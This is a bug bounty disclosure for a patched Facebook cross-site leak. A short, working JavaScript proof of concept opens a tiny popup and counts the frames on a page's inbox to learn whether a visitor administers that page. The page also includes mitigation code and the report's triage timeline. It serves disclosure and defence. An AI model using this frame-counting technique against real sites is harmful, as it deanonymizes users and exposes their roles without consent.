Richard Telleng

Published On: 02 Jul 2019

$750

Disclose facebook user page roles (Admin/Editor/Mod)

Identification/Deanonymization
Facebook | Web
---
LOW VALID

I was reading this blog post https://www.imperva.com/blog/facebook-privacy-bug/ and tried to find a Facebook endpoint that reflects the JavaScript frames.length (number of iframes) > 0.

Description

I've found that if the user has permission to access https://web.facebook.com/[page_username]/inbox, I get frames.length = 1 when there is no message in the page inbox and frames.length = 3 when the inbox contains a message. If the user doesn't have permission to read the page inbox, the endpoint returns an error page, which has frames.length = 0.

Impact

This bug allows an attacker to identify whether a Facebook user holds an admin/editor/moderator role on a given page.




Reproduction Steps

Step 1

Here is the script:

<script>
function test()
{
  // Username of the page to probe; the victim's browser is asked to open this page's inbox.
  page = "Your Page Username";
  h = 1;
  w = 1;
  // Open a 1x1 popup in the bottom-right corner of the viewport.
  t = window.innerHeight - h;
  l = window.innerWidth - w;
  if (fb === undefined) {
    var fb = window.open("", "", "height=" + h + ",width=" + w + ",left=" + l + ",top=" + t);
    console.log(fb === undefined);
  }

  fb.location = "https://web.facebook.com/" + page + "/inbox/";
  setTimeout(function ()
  {
    // frames.length is 0 on the error page, 1 for an empty inbox and 3 when the inbox contains a message.
    var answer = fb.frames.length == 0 ? 'No' : 'Yes';
    var a = fb.frames.length > 1 ? 'No' : "Yes";
    console.log('Are you an Admin/Editor/Moderator in : ' + page + ' ? -- ' + answer + ' Mailbox Empty ? -- ' + a);
    fb.close();
  }, 5000);
}
</script>

Step 2

Change the page variable and, as the victim, visit the website that hosts the script above.

Step 3

The console should tell you whether the user holds a page admin/editor/moderator role on the page that you set in the page variable.
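The leak above works because the opener can read frames.length of the popup and the count differs by authorization state. The following is an added mitigation example written for this write-up, not code from the report or from Facebook; the handler name, permission store and sample data are constructed. It removes the oracle in two independent ways: it sends Cross-Origin-Opener-Policy: same-origin so a cross-origin opener loses its reference to the popup (frames.length reads as 0 for everyone), and it renders the same frame skeleton and status code whether the inbox is readable, empty, or forbidden.

```javascript
// Hypothetical permission store (constructed sample data): which users may read a page's inbox.
const pagePermissions = {
  examplepage: new Set(['alice']),
};

// Fixed number of iframes emitted for every state, so the count carries no information.
const IFRAME_SLOTS = 3;

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Counts <iframe> elements in a rendered document; used to check the uniform-skeleton property.
function countIframes(html) {
  return (html.match(/<iframe\b/gi) || []).length;
}

// Renders the inbox page for `user`. Message content differs by state, the frame skeleton does not.
function renderInboxPage(pageName, user, messages) {
  const perms = pagePermissions[pageName];
  const allowed = perms !== undefined && perms.has(user);
  const items = allowed
    ? messages.map(m => `<li>${escapeHtml(m)}</li>`).join('')
    : '<li>You do not have permission to view this inbox.</li>';
  // Always emit IFRAME_SLOTS iframes; unused slots load a blank same-origin document.
  const frames = Array.from({ length: IFRAME_SLOTS }, (_, i) =>
    `<iframe name="slot${i}" src="/blank"></iframe>`).join('');
  return {
    status: 200, // same status for authorized, empty and forbidden states
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      // Puts the popup in its own browsing context group: the opener's WindowProxy is disconnected.
      'Cross-Origin-Opener-Policy': 'same-origin',
      // Also refuse to be embedded, closing the framing variant of the same counting trick.
      'X-Frame-Options': 'DENY',
    },
    body: `<!doctype html><ul>${items}</ul>${frames}`,
  };
}
```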


Timeline

Richard, 20 May 2019: Initial Report

Facebook, 23 May 2019: Pre-Triaged. Hi Richard, Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investi ...

Facebook, 30 May 2019: Triaged. Hi Richard, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will ...

Facebook, 11 Jun 2019: Fixed. Hi Richard, We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch ...

Richard, 11 Jun 2019: Confirmation

Facebook, 21 Jun 2019: Bounty Awarded. Hi Richard Telleng, After reviewing this issue, we have decided to award you a bounty of $750. Below is an explanation of the bounty amount. Fac ...
